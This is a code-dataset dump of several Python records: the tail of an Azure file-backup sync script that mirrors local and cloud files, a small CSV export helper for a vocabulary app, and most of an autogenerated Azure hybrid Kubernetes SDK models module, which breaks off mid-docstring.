os.remove(path=file_path)\n logger.info(\"Success: %s file removed\" % file_path)\n \n else:\n # If it fails, inform the user.\n logger.error(\"Error: %s file not found\" % file_path)\n\n # Remove DIR \n folder_path = file_path.replace(os.path.basename(file_path), '')\n if len(os.listdir(path=folder_path)) == 0:\n os.rmdir(path=folder_path, dir_fd = None)\n logger.info(\"Success: %s folder removed\" % folder_path)\n \n \n @property\n def backup_svc(self) ->None:\n \"\"\"Compares the state of the files from the last time the script was run, \n and compares it with the current state of the files to detect changes, \n ensuring that the files in the cloud storage \n and the files in the local storage are always in sync.\n \"\"\"\n before_local = self.before_save_local\n after_local = self.file_time_list\n \n logger.info(\"Scanning DB for Cloud Changes\")\n before_cloud = self.db_resource.scan_all_items\n after_cloud = self.storage_resource.blob_file_time_list \n \n print('-----------------------------------------------------------------------------------')\n logger.info(f\"Local Directory file count before: {len(before_local)}\")\n \n file_time_added_cloud = {key: value for key, value in after_cloud.items() if key not in before_cloud}\n file_time_removed_cloud = {key: value for key, value in before_cloud.items() if key not in after_cloud}\n file_time_changed_cloud = {key: value for key,value in after_cloud.items() if key in dict(\n set(before_cloud.items()) - set(after_cloud.items()))} \n \n file_time_added_local = {key: value for key, value in after_local.items() if key not in before_local} \n file_time_removed_local = {key: value for key, value in before_local.items() if key not in after_local} \n file_time_changed = {key: value for key,value in after_local.items() if key in dict(\n set(before_local.items()) - set(after_local.items()))} \n file_time_changed_local = {key: value for key,value in file_time_changed.items() if key not in file_time_changed_cloud}\n \n ###################################################\n # before_cloud vs after_cloud if Added\n if file_time_added_cloud:\n # Action: download from remote storage. 
For: Added\n logger.info(f\"|1| Cloud Added: Downloading: {file_time_added_cloud.keys()}\")\n # Function to download files from Cloud\n self.storage_resource.get_list(file_time_added_cloud.keys())\n # updates local record\n self.file_select_times(file_list=file_time_added_cloud.keys(), after_local=after_local)\n # Function to update DB\n db_cloud_add = self.storage_resource.blob_file_select_time_list(file_time_added_cloud.keys())\n self.db_resource.add_update_dictionary(db_cloud_add)\n ####################################################\n # Check to see what was removed by another client in cloud.\n if file_time_removed_cloud: \n # Action: remove file from: client\n logger.info(f\"|2| Cloud Removed: Deleting locally: {file_time_removed_cloud.keys()}\")\n # Function to Remove files from Folder in client\n self.delete_files(file_time_removed_cloud.keys())\n [after_local.pop(key) for key in file_time_removed_cloud.keys()]\n # Function to update DB\n self.db_resource.delete_item_list(file_time_removed_cloud.keys()) \n ####################################################\n # What existing files have changed in Cloud since last scan\n if file_time_changed_cloud:\n # Action: Download from Storage \n logger.info(f\"|3| Cloud Changed: {file_time_changed_cloud.keys()}\")\n # Function to add files from Storage\n self.storage_resource.get_list(file_time_changed_cloud.keys())\n # updates local record\n self.file_select_times(file_list=file_time_changed_cloud.keys(), after_local=after_local)\n # Function to update DB\n db_cloud_changed = self.storage_resource.blob_file_select_time_list(file_time_changed_cloud.keys())\n self.db_resource.add_update_dictionary(db_cloud_changed)\n ####################################################\n # files added to local \n if file_time_added_local:\n # Action: upload to cloud and update db\n logger.info(f\"|4| Local Added, Upload to Cloud: {file_time_added_local.keys()}\")\n # Function to Upload files to Storage\n self.storage_resource.put_list(file_time_added_local.keys())\n # Function to update DB with current values\n db_cloud_add = self.storage_resource.blob_file_select_time_list(file_time_added_local.keys())\n self.db_resource.add_update_dictionary(db_cloud_add) \n ####################################################\n # file removed from local\n if file_time_removed_local:\n # Action: Remove both object(s) from storage and Entry(s) from DB.\n logger.info(f\"|5| Local Removed.. Delete Cloud: {file_time_removed_local.keys()}\")\n # Function to Remove file for Remote Storage\n self.storage_resource.delete_list(file_time_removed_local.keys())\n # Function to Remove Entry from DB\n self.db_resource.delete_item_list(file_time_removed_local.keys())\n ####################################################\n # Existing file have changed in local.\n if file_time_changed_local:\n # Action update files to storage if files were not changed in storage.\n logger.info(f\"|6| Local Changed.. 
Update to Cloud: {file_time_changed_local.keys()}\")\n # Func to update to Storage\n self.storage_resource.put_list(file_time_changed_local.keys())\n # func to update DB\n db_cloud_changed = self.storage_resource.blob_file_select_time_list(file_time_changed_local.keys())\n self.db_resource.add_update_dictionary(db_cloud_changed)\n ####################################################\n else:\n print('-----------------------------------------------------------------------------------')\n logger.info(\"No Local or Cloud File Changes Detected..\")\n print('-----------------------------------------------------------------------------------')\n \n self.after_save_local(after_local) # Saves Changes to after_local\n \n logger.info(f'Local Directory file count after: {len(after_local)}')\n print('-----------------------------------------------------------------------------------')\n logger.info(f'All Done waiting:{self.t_sec} seconds.')\n time.sleep(self.t_sec)\n \n \nparams = config()\nmy_backup_folder = FileTracker(**params)\n\n#while True:\nfor i in range(50):\n \n print('--------------------------------------------------------------------------------------------------------------------')\n print('Run:', i)\n my_backup_folder.backup_svc\n print('--------------------------------------------------------------------------------------------------------------------')","repo_name":"bigtime007/azure-automated-file-backup","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39100254362","text":"import csv\n\nfrom SharedData.DictionaryData import DictionaryData\n\n\nclass ExportData(staticmethod):\n @staticmethod\n def export_pure_table_csv(path):\n with open(path, 'w', encoding='Shift-JIS', newline=\"\") as f:\n csv_writer = csv.writer(f)\n header = [\"单词\", \"词性\", \"释义\", \"例子\", \"音标\"]\n csv_writer.writerow(header)\n for word in DictionaryData.current_word_list:\n csv_writer.writerow(word.get_value()[:-1])","repo_name":"peler-little-pig/HaoCiKuaiJi","sub_path":"Lib/ExportData.py","file_name":"ExportData.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3559498102","text":"import datetime\nimport sys\nfrom typing import Any, Dict, List, Optional, TYPE_CHECKING, Union\n\nfrom .. import _serialization\n\nif sys.version_info >= (3, 9):\n from collections.abc import MutableMapping\nelse:\n from typing import MutableMapping # type: ignore # pylint: disable=ungrouped-imports\n\nif TYPE_CHECKING:\n # pylint: disable=unused-import,ungrouped-imports\n from .. import models as _models\nJSON = MutableMapping[str, Any] # pylint: disable=unsubscriptable-object\n\n\nclass Resource(_serialization.Model):\n \"\"\"Common fields that are returned in the response for all Azure Resource Manager resources.\n\n Variables are only populated by the server, and will be ignored when sending a request.\n\n :ivar id: Fully qualified resource ID for the resource. Ex -\n /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.\n :vartype id: str\n :ivar name: The name of the resource.\n :vartype name: str\n :ivar type: The type of the resource. E.g. 
\"Microsoft.Compute/virtualMachines\" or\n \"Microsoft.Storage/storageAccounts\".\n :vartype type: str\n \"\"\"\n\n _validation = {\n \"id\": {\"readonly\": True},\n \"name\": {\"readonly\": True},\n \"type\": {\"readonly\": True},\n }\n\n _attribute_map = {\n \"id\": {\"key\": \"id\", \"type\": \"str\"},\n \"name\": {\"key\": \"name\", \"type\": \"str\"},\n \"type\": {\"key\": \"type\", \"type\": \"str\"},\n }\n\n def __init__(self, **kwargs):\n \"\"\" \"\"\"\n super().__init__(**kwargs)\n self.id = None\n self.name = None\n self.type = None\n\n\nclass TrackedResource(Resource):\n \"\"\"The resource model definition for an Azure Resource Manager tracked top level resource which has 'tags' and a 'location'.\n\n Variables are only populated by the server, and will be ignored when sending a request.\n\n All required parameters must be populated in order to send to Azure.\n\n :ivar id: Fully qualified resource ID for the resource. Ex -\n /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.\n :vartype id: str\n :ivar name: The name of the resource.\n :vartype name: str\n :ivar type: The type of the resource. E.g. \"Microsoft.Compute/virtualMachines\" or\n \"Microsoft.Storage/storageAccounts\".\n :vartype type: str\n :ivar tags: Resource tags.\n :vartype tags: dict[str, str]\n :ivar location: The geo-location where the resource lives. Required.\n :vartype location: str\n \"\"\"\n\n _validation = {\n \"id\": {\"readonly\": True},\n \"name\": {\"readonly\": True},\n \"type\": {\"readonly\": True},\n \"location\": {\"required\": True},\n }\n\n _attribute_map = {\n \"id\": {\"key\": \"id\", \"type\": \"str\"},\n \"name\": {\"key\": \"name\", \"type\": \"str\"},\n \"type\": {\"key\": \"type\", \"type\": \"str\"},\n \"tags\": {\"key\": \"tags\", \"type\": \"{str}\"},\n \"location\": {\"key\": \"location\", \"type\": \"str\"},\n }\n\n def __init__(self, *, location: str, tags: Optional[Dict[str, str]] = None, **kwargs):\n \"\"\"\n :keyword tags: Resource tags.\n :paramtype tags: dict[str, str]\n :keyword location: The geo-location where the resource lives. Required.\n :paramtype location: str\n \"\"\"\n super().__init__(**kwargs)\n self.tags = tags\n self.location = location\n\n\nclass ConnectedCluster(TrackedResource): # pylint: disable=too-many-instance-attributes\n \"\"\"Represents a connected cluster.\n\n Variables are only populated by the server, and will be ignored when sending a request.\n\n All required parameters must be populated in order to send to Azure.\n\n :ivar id: Fully qualified resource ID for the resource. Ex -\n /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.\n :vartype id: str\n :ivar name: The name of the resource.\n :vartype name: str\n :ivar type: The type of the resource. E.g. \"Microsoft.Compute/virtualMachines\" or\n \"Microsoft.Storage/storageAccounts\".\n :vartype type: str\n :ivar tags: Resource tags.\n :vartype tags: dict[str, str]\n :ivar location: The geo-location where the resource lives. Required.\n :vartype location: str\n :ivar identity: The identity of the connected cluster. 
Required.\n :vartype identity: ~azure.mgmt.hybridkubernetes.models.ConnectedClusterIdentity\n :ivar system_data: Metadata pertaining to creation and last modification of the resource.\n :vartype system_data: ~azure.mgmt.hybridkubernetes.models.SystemData\n :ivar agent_public_key_certificate: Base64 encoded public certificate used by the agent to do\n the initial handshake to the backend services in Azure. Required.\n :vartype agent_public_key_certificate: str\n :ivar kubernetes_version: The Kubernetes version of the connected cluster resource.\n :vartype kubernetes_version: str\n :ivar total_node_count: Number of nodes present in the connected cluster resource.\n :vartype total_node_count: int\n :ivar total_core_count: Number of CPU cores present in the connected cluster resource.\n :vartype total_core_count: int\n :ivar agent_version: Version of the agent running on the connected cluster resource.\n :vartype agent_version: str\n :ivar provisioning_state: Provisioning state of the connected cluster resource. Known values\n are: \"Succeeded\", \"Failed\", \"Canceled\", \"Provisioning\", \"Updating\", \"Deleting\", and \"Accepted\".\n :vartype provisioning_state: str or ~azure.mgmt.hybridkubernetes.models.ProvisioningState\n :ivar distribution: The Kubernetes distribution running on this connected cluster.\n :vartype distribution: str\n :ivar infrastructure: The infrastructure on which the Kubernetes cluster represented by this\n connected cluster is running on.\n :vartype infrastructure: str\n :ivar offering: Connected cluster offering.\n :vartype offering: str\n :ivar managed_identity_certificate_expiration_time: Expiration time of the managed identity\n certificate.\n :vartype managed_identity_certificate_expiration_time: ~datetime.datetime\n :ivar last_connectivity_time: Time representing the last instance when heart beat was received\n from the cluster.\n :vartype last_connectivity_time: ~datetime.datetime\n :ivar connectivity_status: Represents the connectivity status of the connected cluster. 
Known\n values are: \"Connecting\", \"Connected\", \"Offline\", and \"Expired\".\n :vartype connectivity_status: str or ~azure.mgmt.hybridkubernetes.models.ConnectivityStatus\n \"\"\"\n\n _validation = {\n \"id\": {\"readonly\": True},\n \"name\": {\"readonly\": True},\n \"type\": {\"readonly\": True},\n \"location\": {\"required\": True},\n \"identity\": {\"required\": True},\n \"system_data\": {\"readonly\": True},\n \"agent_public_key_certificate\": {\"required\": True},\n \"kubernetes_version\": {\"readonly\": True},\n \"total_node_count\": {\"readonly\": True},\n \"total_core_count\": {\"readonly\": True},\n \"agent_version\": {\"readonly\": True},\n \"offering\": {\"readonly\": True},\n \"managed_identity_certificate_expiration_time\": {\"readonly\": True},\n \"last_connectivity_time\": {\"readonly\": True},\n \"connectivity_status\": {\"readonly\": True},\n }\n\n _attribute_map = {\n \"id\": {\"key\": \"id\", \"type\": \"str\"},\n \"name\": {\"key\": \"name\", \"type\": \"str\"},\n \"type\": {\"key\": \"type\", \"type\": \"str\"},\n \"tags\": {\"key\": \"tags\", \"type\": \"{str}\"},\n \"location\": {\"key\": \"location\", \"type\": \"str\"},\n \"identity\": {\"key\": \"identity\", \"type\": \"ConnectedClusterIdentity\"},\n \"system_data\": {\"key\": \"systemData\", \"type\": \"SystemData\"},\n \"agent_public_key_certificate\": {\"key\": \"properties.agentPublicKeyCertificate\", \"type\": \"str\"},\n \"kubernetes_version\": {\"key\": \"properties.kubernetesVersion\", \"type\": \"str\"},\n \"total_node_count\": {\"key\": \"properties.totalNodeCount\", \"type\": \"int\"},\n \"total_core_count\": {\"key\": \"properties.totalCoreCount\", \"type\": \"int\"},\n \"agent_version\": {\"key\": \"properties.agentVersion\", \"type\": \"str\"},\n \"provisioning_state\": {\"key\": \"properties.provisioningState\", \"type\": \"str\"},\n \"distribution\": {\"key\": \"properties.distribution\", \"type\": \"str\"},\n \"infrastructure\": {\"key\": \"properties.infrastructure\", \"type\": \"str\"},\n \"offering\": {\"key\": \"properties.offering\", \"type\": \"str\"},\n \"managed_identity_certificate_expiration_time\": {\n \"key\": \"properties.managedIdentityCertificateExpirationTime\",\n \"type\": \"iso-8601\",\n },\n \"last_connectivity_time\": {\"key\": \"properties.lastConnectivityTime\", \"type\": \"iso-8601\"},\n \"connectivity_status\": {\"key\": \"properties.connectivityStatus\", \"type\": \"str\"},\n }\n\n def __init__(\n self,\n *,\n location: str,\n identity: \"_models.ConnectedClusterIdentity\",\n agent_public_key_certificate: str,\n tags: Optional[Dict[str, str]] = None,\n provisioning_state: Optional[Union[str, \"_models.ProvisioningState\"]] = None,\n distribution: Optional[str] = None,\n infrastructure: Optional[str] = None,\n **kwargs\n ):\n \"\"\"\n :keyword tags: Resource tags.\n :paramtype tags: dict[str, str]\n :keyword location: The geo-location where the resource lives. Required.\n :paramtype location: str\n :keyword identity: The identity of the connected cluster. Required.\n :paramtype identity: ~azure.mgmt.hybridkubernetes.models.ConnectedClusterIdentity\n :keyword agent_public_key_certificate: Base64 encoded public certificate used by the agent to\n do the initial handshake to the backend services in Azure. Required.\n :paramtype agent_public_key_certificate: str\n :keyword provisioning_state: Provisioning state of the connected cluster resource. 
Known values\n are: \"Succeeded\", \"Failed\", \"Canceled\", \"Provisioning\", \"Updating\", \"Deleting\", and \"Accepted\".\n :paramtype provisioning_state: str or ~azure.mgmt.hybridkubernetes.models.ProvisioningState\n :keyword distribution: The Kubernetes distribution running on this connected cluster.\n :paramtype distribution: str\n :keyword infrastructure: The infrastructure on which the Kubernetes cluster represented by this\n connected cluster is running on.\n :paramtype infrastructure: str\n \"\"\"\n super().__init__(tags=tags, location=location, **kwargs)\n self.identity = identity\n self.system_data = None\n self.agent_public_key_certificate = agent_public_key_certificate\n self.kubernetes_version = None\n self.total_node_count = None\n self.total_core_count = None\n self.agent_version = None\n self.provisioning_state = provisioning_state\n self.distribution = distribution\n self.infrastructure = infrastructure\n self.offering = None\n self.managed_identity_certificate_expiration_time = None\n self.last_connectivity_time = None\n self.connectivity_status = None\n\n\nclass ConnectedClusterIdentity(_serialization.Model):\n \"\"\"Identity for the connected cluster.\n\n Variables are only populated by the server, and will be ignored when sending a request.\n\n All required parameters must be populated in order to send to Azure.\n\n :ivar principal_id: The principal id of connected cluster identity. This property will only be\n provided for a system assigned identity.\n :vartype principal_id: str\n :ivar tenant_id: The tenant id associated with the connected cluster. This property will only\n be provided for a system assigned identity.\n :vartype tenant_id: str\n :ivar type: The type of identity used for the connected cluster. The type 'SystemAssigned,\n includes a system created identity. The type 'None' means no identity is assigned to the\n connected cluster. Known values are: \"None\" and \"SystemAssigned\".\n :vartype type: str or ~azure.mgmt.hybridkubernetes.models.ResourceIdentityType\n \"\"\"\n\n _validation = {\n \"principal_id\": {\"readonly\": True},\n \"tenant_id\": {\"readonly\": True},\n \"type\": {\"required\": True},\n }\n\n _attribute_map = {\n \"principal_id\": {\"key\": \"principalId\", \"type\": \"str\"},\n \"tenant_id\": {\"key\": \"tenantId\", \"type\": \"str\"},\n \"type\": {\"key\": \"type\", \"type\": \"str\"},\n }\n\n def __init__(self, *, type: Union[str, \"_models.ResourceIdentityType\"] = \"SystemAssigned\", **kwargs):\n \"\"\"\n :keyword type: The type of identity used for the connected cluster. The type 'SystemAssigned,\n includes a system created identity. The type 'None' means no identity is assigned to the\n connected cluster. 
Known values are: \"None\" and \"SystemAssigned\".\n :paramtype type: str or ~azure.mgmt.hybridkubernetes.models.ResourceIdentityType\n \"\"\"\n super().__init__(**kwargs)\n self.principal_id = None\n self.tenant_id = None\n self.type = type\n\n\nclass ConnectedClusterList(_serialization.Model):\n \"\"\"The paginated list of connected Clusters.\n\n :ivar value: The list of connected clusters.\n :vartype value: list[~azure.mgmt.hybridkubernetes.models.ConnectedCluster]\n :ivar next_link: The link to fetch the next page of connected cluster.\n :vartype next_link: str\n \"\"\"\n\n _attribute_map = {\n \"value\": {\"key\": \"value\", \"type\": \"[ConnectedCluster]\"},\n \"next_link\": {\"key\": \"nextLink\", \"type\": \"str\"},\n }\n\n def __init__(\n self, *, value: Optional[List[\"_models.ConnectedCluster\"]] = None, next_link: Optional[str] = None, **kwargs\n ):\n \"\"\"\n :keyword value: The list of connected clusters.\n :paramtype value: list[~azure.mgmt.hybridkubernetes.models.ConnectedCluster]\n :keyword next_link: The link to fetch the next page of connected cluster.\n :paramtype next_link: str\n \"\"\"\n super().__init__(**kwargs)\n self.value = value\n self.next_link = next_link\n\n\nclass ConnectedClusterPatch(_serialization.Model):\n \"\"\"Object containing updates for patch operations.\n\n :ivar tags: Resource tags.\n :vartype tags: dict[str, str]\n :ivar properties: Describes the connected cluster resource properties that can be updated\n during PATCH operation.\n :vartype properties: JSON\n \"\"\"\n\n _attribute_map = {\n \"tags\": {\"key\": \"tags\", \"type\": \"{str}\"},\n \"properties\": {\"key\": \"properties\", \"type\": \"object\"},\n }\n\n def __init__(self, *, tags: Optional[Dict[str, str]] = None, properties: Optional[JSON] = None, **kwargs):\n \"\"\"\n :keyword tags: Resource tags.\n :paramtype tags: dict[str, str]\n :keyword properties: Describes the connected cluster resource properties that can be updated\n during PATCH operation.\n :paramtype properties: JSON\n \"\"\"\n super().__init__(**kwargs)\n self.tags = tags\n self.properties = properties\n\n\nclass CredentialResult(_serialization.Model):\n \"\"\"The credential result response.\n\n Variables are only populated by the server, and will be ignored when sending a request.\n\n :ivar name: The name of the credential.\n :vartype name: str\n :ivar value: Base64-encoded Kubernetes configuration file.\n :vartype value: bytes\n \"\"\"\n\n _validation = {\n \"name\": {\"readonly\": True},\n \"value\": {\"readonly\": True},\n }\n\n _attribute_map = {\n \"name\": {\"key\": \"name\", \"type\": \"str\"},\n \"value\": {\"key\": \"value\", \"type\": \"bytearray\"},\n }\n\n def __init__(self, **kwargs):\n \"\"\" \"\"\"\n super().__init__(**kwargs)\n self.name = None\n self.value = None\n\n\nclass CredentialResults(_serialization.Model):\n \"\"\"The list of credential result response.\n\n Variables are only populated by the server, and will be ignored when sending a request.\n\n :ivar hybrid_connection_config: Contains the REP (rendezvous endpoint) and “Sender” access\n token.\n :vartype hybrid_connection_config: ~azure.mgmt.hybridkubernetes.models.HybridConnectionConfig\n :ivar kubeconfigs: Base64-encoded Kubernetes configuration file.\n :vartype kubeconfigs: list[~azure.mgmt.hybridkubernetes.models.CredentialResult]\n \"\"\"\n\n _validation = {\n \"hybrid_connection_config\": {\"readonly\": True},\n \"kubeconfigs\": {\"readonly\": True},\n }\n\n _attribute_map = {\n \"hybrid_connection_config\": {\"key\": 
\"hybridConnectionConfig\", \"type\": \"HybridConnectionConfig\"},\n \"kubeconfigs\": {\"key\": \"kubeconfigs\", \"type\": \"[CredentialResult]\"},\n }\n\n def __init__(self, **kwargs):\n \"\"\" \"\"\"\n super().__init__(**kwargs)\n self.hybrid_connection_config = None\n self.kubeconfigs = None\n\n\nclass ErrorAdditionalInfo(_serialization.Model):\n \"\"\"The resource management error additional info.\n\n Variables are only populated by the server, and will be ignored when sending a request.\n\n :ivar type: The additional info type.\n :vartype type: str\n :ivar info: The additional info.\n :vartype info: JSON\n \"\"\"\n\n _validation = {\n \"type\": {\"readonly\": True},\n \"info\": {\"readonly\": True},\n }\n\n _attribute_map = {\n \"type\": {\"key\": \"type\", \"type\": \"str\"},\n \"info\": {\"key\": \"info\", \"type\": \"object\"},\n }\n\n def __init__(self, **kwargs):\n \"\"\" \"\"\"\n super().__init__(**kwargs)\n self.type = None\n self.info = None\n\n\nclass ErrorDetail(_serialization.Model):\n \"\"\"The error detail.\n\n Variables are only populated by the server, and will be ignored when sending a request.\n\n :ivar code: The error code.\n :vartype code: str\n :ivar message: The error message.\n :vartype message: str\n :ivar target: The error target.\n :vartype target: str\n :ivar details: The error details.\n :vartype details: list[~azure.mgmt.hybridkubernetes.models.ErrorDetail]\n :ivar additional_info: The error additional info.\n :vartype additional_info: list[~azure.mgmt.hybridkubernetes.models.ErrorAdditionalInfo]\n \"\"\"\n\n _validation = {\n \"code\": {\"readonly\": True},\n \"message\": {\"readonly\": True},\n \"target\": {\"readonly\": True},\n \"details\": {\"readonly\": True},\n \"additional_info\": {\"readonly\": True},\n }\n\n _attribute_map = {\n \"code\": {\"key\": \"code\", \"type\": \"str\"},\n \"message\": {\"key\": \"message\", \"type\": \"str\"},\n \"target\": {\"key\": \"target\", \"type\": \"str\"},\n \"details\": {\"key\": \"details\", \"type\": \"[ErrorDetail]\"},\n \"additional_info\": {\"key\": \"additionalInfo\", \"type\": \"[ErrorAdditionalInfo]\"},\n }\n\n def __init__(self, **kwargs):\n \"\"\" \"\"\"\n super().__init__(**kwargs)\n self.code = None\n self.message = None\n self.target = None\n self.details = None\n self.additional_info = None\n\n\nclass ErrorResponse(_serialization.Model):\n \"\"\"Common error response for all Azure Resource Manager APIs to return error details for failed operations. 
(This also follows the OData error response format.).\n\n :ivar error: The error object.\n :vartype error: ~azure.mgmt.hybridkubernetes.models.ErrorDetail\n \"\"\"\n\n _attribute_map = {\n \"error\": {\"key\": \"error\", \"type\": \"ErrorDetail\"},\n }\n\n def __init__(self, *, error: Optional[\"_models.ErrorDetail\"] = None, **kwargs):\n \"\"\"\n :keyword error: The error object.\n :paramtype error: ~azure.mgmt.hybridkubernetes.models.ErrorDetail\n \"\"\"\n super().__init__(**kwargs)\n self.error = error\n\n\nclass HybridConnectionConfig(_serialization.Model):\n \"\"\"Contains the REP (rendezvous endpoint) and “Sender” access token.\n\n Variables are only populated by the server, and will be ignored when sending a request.\n\n :ivar expiration_time: Timestamp when this token will be expired.\n :vartype expiration_time: int\n :ivar hybrid_connection_name: Name of the connection.\n :vartype hybrid_connection_name: str\n :ivar relay: Name of the relay.\n :vartype relay: str\n :ivar token: Sender access token.\n :vartype token: str\n \"\"\"\n\n _validation = {\n \"expiration_time\": {\"readonly\": True},\n \"hybrid_connection_name\": {\"readonly\": True},\n \"relay\": {\"readonly\": True},\n \"token\": {\"readonly\": True},\n }\n\n _attribute_map = {\n \"expiration_time\": {\"key\": \"expirationTime\", \"type\": \"int\"},\n \"hybrid_connection_name\": {\"key\": \"hybridConnectionName\", \"type\": \"str\"},\n \"relay\": {\"key\": \"relay\", \"type\": \"str\"},\n \"token\": {\"key\": \"token\", \"type\": \"str\"},\n }\n\n def __init__(self, **kwargs):\n \"\"\" \"\"\"\n super().__init__(**kwargs)\n self.expiration_time = None\n self.hybrid_connection_name = None\n self.relay = None\n self.token = None\n\n\nclass ListClusterUserCredentialProperties(_serialization.Model):\n \"\"\"ListClusterUserCredentialProperties.\n\n All required parameters must be populated in order to send to Azure.\n\n :ivar authentication_method: The mode of client authentication. Required. Known values are:\n \"Token\" and \"AAD\".\n :vartype authentication_method: str or ~azure.mgmt.hybridkubernetes.models.AuthenticationMethod\n :ivar client_proxy: Boolean value to indicate whether the request is for client side proxy or\n not. Required.\n :vartype client_proxy: bool\n \"\"\"\n\n _validation = {\n \"authentication_method\": {\"required\": True},\n \"client_proxy\": {\"required\": True},\n }\n\n _attribute_map = {\n \"authentication_method\": {\"key\": \"authenticationMethod\", \"type\": \"str\"},\n \"client_proxy\": {\"key\": \"clientProxy\", \"type\": \"bool\"},\n }\n\n def __init__(\n self, *, authentication_method: Union[str, \"_models.AuthenticationMethod\"], client_proxy: bool, **kwargs\n ):\n \"\"\"\n :keyword authentication_method: The mode of client authentication. Required. Known values are:\n \"Token\" and \"AAD\".\n :paramtype authentication_method: str or\n ~azure.mgmt.hybridkubernetes.models.AuthenticationMethod\n :keyword client_proxy: Boolean value to indicate whether the request is for client side proxy\n or not. 
Required.\n :paramtype client_proxy: bool\n \"\"\"\n super().__init__(**kwargs)\n self.authentication_method = authentication_method\n self.client_proxy = client_proxy\n\n\nclass Operation(_serialization.Model):\n \"\"\"The Connected cluster API operation.\n\n Variables are only populated by the server, and will be ignored when sending a request.\n\n :ivar name: Operation name: {Microsoft.Kubernetes}/{resource}/{operation}.\n :vartype name: str\n :ivar display: The object that represents the operation.\n :vartype display: ~azure.mgmt.hybridkubernetes.models.OperationDisplay\n \"\"\"\n\n _validation = {\n \"name\": {\"readonly\": True},\n \"display\": {\"readonly\": True},\n }\n\n _attribute_map = {\n \"name\": {\"key\": \"name\", \"type\": \"str\"},\n \"display\": {\"key\": \"display\", \"type\": \"OperationDisplay\"},\n }\n\n def __init__(self, **kwargs):\n \"\"\" \"\"\"\n super().__init__(**kwargs)\n self.name = None\n self.display = None\n\n\nclass OperationDisplay(_serialization.Model):\n \"\"\"The object that represents the operation.\n\n :ivar provider: Service provider: Microsoft.connectedClusters.\n :vartype provider: str\n :ivar resource: Connected Cluster Resource on which the operation is performed.\n :vartype resource: str\n :ivar operation: Operation type: Read, write, delete, etc.\n :vartype operation: str\n :ivar description: Description of the operation.\n :vartype description: str\n \"\"\"\n\n _attribute_map = {\n \"provider\": {\"key\": \"provider\", \"type\": \"str\"},\n \"resource\": {\"key\": \"resource\", \"type\": \"str\"},\n \"operation\": {\"key\": \"operation\", \"type\": \"str\"},\n \"description\": {\"key\": \"description\", \"type\": \"str\"},\n }\n\n def __init__(\n self,\n *,\n provider: Optional[str] = None,\n resource: Optional[str] = None,\n operation: Optional[str] = None,\n description: Optional[str] = None,\n **kwargs\n ):\n \"\"\"\n :keyword provider: Service provider: Microsoft.connectedClusters.\n :paramtype provider: str\n :keyword resource: Connected Cluster Resource on which the operation is performed.\n :paramtype resource: str\n :keyword operation: Operation type: Read, write, delete, etc.\n :paramtype operation: str\n :keyword description: Description of the operation.\n :paramtype description: str\n \"\"\"\n super().__init__(**kwargs)\n self.provider = provider\n self.resource = resource\n self.operation = operation\n self.description = description\n\n\nclass OperationList(_serialization.Model):\n \"\"\"The paginated list of connected cluster API operations.\n\n Variables are only populated by the server, and will be ignored when sending a request.\n\n :ivar value: The list of connected cluster API operations.\n :vartype value: list[~azure.mgmt.hybridkubernetes.models.Operation]\n :ivar next_link: The link to fetch the next page of connected cluster API operations.\n :vartype next_link: str\n \"\"\"\n\n _validation = {\n \"value\": {\"readonly\": True},\n }\n\n _attribute_map = {\n \"value\": {\"key\": \"value\", \"type\": \"[Operation]\"},\n \"next_link\": {\"key\": \"nextLink\", \"type\": \"str\"},\n }\n\n def __init__(self, *, next_link: Optional[str] = None, **kwargs):\n \"\"\"\n :keyword next_link: The link to fetch the next page of connected cluster API operations.\n :paramtype next_link: str\n \"\"\"\n super().__init__(**kwargs)\n self.value = None\n self.next_link = next_link\n\n\nclass SystemData(_serialization.Model):\n \"\"\"Metadata pertaining to creation and last modification of the resource.\n\n :ivar created_by: The identity 
that created the resource.\n :vartype created_by: str\n :ivar created_by_type: The type of identity that created the resource. Known values are:\n \"User\", \"Application\", \"ManagedIdentity\", and \"Key\".\n :vartype created_by_type: str or ~azure.mgmt.hybridkubernetes.models.CreatedByType\n :ivar created_at: The timestamp of resource creation (UTC).\n :vartype created_at: ~datetime.datetime\n :ivar last_modified_by: The identity that last modified the resource.\n :vartype last_modified_by: str\n :ivar last_modified_by_type: The type of identity that last modified the resource. Known values\n are: \"User\", \"Application\", \"ManagedIdentity\", and \"Key\".\n :vartype last_modified_by_type: str or ~azure.mgmt.hybridkubernetes.models.LastModifiedByType\n :ivar last_modified_at: The timestamp of resource modification (UTC).\n :vartype last_modified_at: ~datetime.datetime\n \"\"\"\n\n _attribute_map = {\n \"created_by\": {\"key\": \"createdBy\", \"type\": \"str\"},\n \"created_by_type\": {\"key\": \"createdByType\", \"type\": \"str\"},\n \"created_at\": {\"key\": \"createdAt\", \"type\": \"iso-8601\"},\n \"last_modified_by\": {\"key\": \"lastModifiedBy\", \"type\": \"str\"},\n \"last_modified_by_type\": {\"key\": \"lastModifiedByType\", \"type\": \"str\"},\n \"last_modified_at\": {\"key\": \"lastModifiedAt\", \"type\": \"iso-8601\"},\n }\n\n def __init__(\n self,\n *,\n created_by: Optional[str] = None,\n created_by_type: Optional[Union[str, \"_models.CreatedByType\"]] = None,\n created_at: Optional[datetime.datetime] = None,\n last_modified_by: Optional[str] = None,\n last_modified_by_type: Optional[Union[str, \"_models.LastModifiedByType\"]] = None,\n last_modified_at: Optional[datetime.datetime] = None,\n **kwargs\n ):\n \"\"\"\n :keyword created_by: The identity that created the resource.\n :paramtype created_by: str\n :keyword created_by_type: The type of identity that created the resource. Known values are:\n \"User\", \"Application\", \"ManagedIdentity\", and \"Key\".\n :paramtype created_by_type: str or ~azure.mgmt.hybridkubernetes.models.CreatedByType\n :keyword created_at: The timestamp of resource creation (UTC).\n :paramtype created_at: ~datetime.datetime\n :keyword last_modified_by: The identity that last modified the resource.\n :paramtype last_modified_by: str\n :keyword last_modified_by_type: The type of identity that last modified the resource. 
